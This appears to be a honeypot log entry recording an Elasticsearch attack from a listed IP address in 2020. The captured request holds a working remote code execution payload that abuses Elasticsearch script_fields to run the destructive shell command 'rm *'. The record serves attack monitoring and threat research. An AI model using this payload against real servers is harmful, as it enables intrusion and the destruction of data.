Attack cd38f5e9-81a5-479e-962e-f66199aa8265
Details
| ID |
cd38f5e9-81a5-479e-962e-f66199aa8265 |
| Attack Type |
elasticsearch |
| IP Address |
118.25.101.219 |
| Username |
|
| Password |
|
| Client Version |
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
| Country |
China |
| Date |
2020-02-25 07:50AM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "*/*",
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
"Cache-Control": "no-cache"
},
"hostname": "45.63.107.63:9200",
"form_data": {
"source": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"exp\":{\"script\":\"import java.util.*;\\nimport java.io.*;\\nString str = \\\"\\\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\\\"rm *\\\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();\"}}}"
}
}